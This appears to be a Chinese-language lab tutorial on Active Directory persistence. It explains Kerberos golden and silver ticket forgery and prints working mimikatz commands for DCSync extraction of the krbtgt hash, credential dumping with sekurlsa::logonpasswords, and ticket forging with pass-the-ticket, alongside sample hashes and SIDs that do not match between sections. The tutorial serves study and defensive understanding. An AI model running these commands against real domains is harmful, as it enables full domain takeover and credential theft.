声明:本文介绍的技术仅供网络安全技术人员及白帽子使用,任何个人或组织不可传播使用相关技术及工具从事违法犯罪行为,一经发现直接上报国家安全机关处理
权限维持
黄金票据
ms14068的漏洞原理是伪造域管的tgt,而黄金票据的漏洞原理是伪造krbtgt用户的票据,krbtgt用户是域控中用来管理发放票据的用户,拥有了该用户的权限,就可以伪造系统中的任意用户
- 黄金票据的条件要求:
-
1.域名称 hacker.com
2.域的SID 值 S-1-5-21-1854149318-4101476522-1845767379
3.域的KRBTGT账户NTLM密码哈希或者aes-256值
0028977ae726d766b150520dc63df9b4
4.伪造用户名 administrator
提取域用户krbtgt的NTLM密码哈希
lsadump::dcsync /domain:hacker.com /user:krbtgt
伪造administrator用户
kerberos::golden /admin:administrator /domain:hacker.com /sid:S-1-5-21-1836192064-1636381992-1218642615 /krbtgt:ce420fcea94d02d7051ebfb82833edf7 /ptt
白银票据
白银票据与ms14068和黄金票据的原理不太一样,ms14068和黄金票据都是伪造tgt(门票发放票),而白银票据则是伪造st(门票),这样的好处是门票不会经过kdc,从而更加隐蔽,但是伪造的门票只对部分服务起作用,如cifs(文件共享服务),mssql,winrm(windows远程管理),dns等等
- 白银票据的条件要求
-
1.域名
hacker.com
2.域sid
S-1-5-21-1854149318-4101476522-1845767379
3.目标服务器FQDN
dc.hacker.com
4.可利用的服务
cifs
5.服务账号的NTML HASH
52c74fc45feba971209be6f2bc068814
6.需要伪造的用户名
test
获取域控机hash
mimikatz.exe privilege::debug sekurlsa::logonpasswords exit>1.txt
伪造白银票据
kerberos::golden /domain:hacker.com /sid:S-1-5-21-1836192064-1636381992-1218642615 /target:dc.hacker.com /service:cifs /rc4:031091bab05b768b471a7060b6d1bbf1 /user:test /ptt
实验环境:
- Windows Server 2012 R2 x64(域控机)
- Windows 7 x64 sp1 (域用户机)
- pfSense(路由)
ms14068
具体搭建方法请参照企业级内网的域控环境搭建3万字详细部署教程
模拟实验:
伪造黄金票据
信息搜集
ipconfig /all拿到域名
whoami /all拿到SID
使用mimikatz软件拿到krbtgt用户的NTLM密码哈希
输入klist purge删除票证
伪造票证
将搜集到的信息替换到执行语句中使用mimikatz软件伪造administrator用户的票证然后退出
成功拿到域控
删除票据又拒绝访问了
伪造白银票据
信息搜集
ipconfig /all拿到域控ip
输入ping -a 10.1.1.1获取域全名dc.kacker.com
whoami /all拿到SID
导出域控机的hash
伪造票证
將搜集到的信息替换到执行语句中使用mimikatz软件伪造票证,访问即可
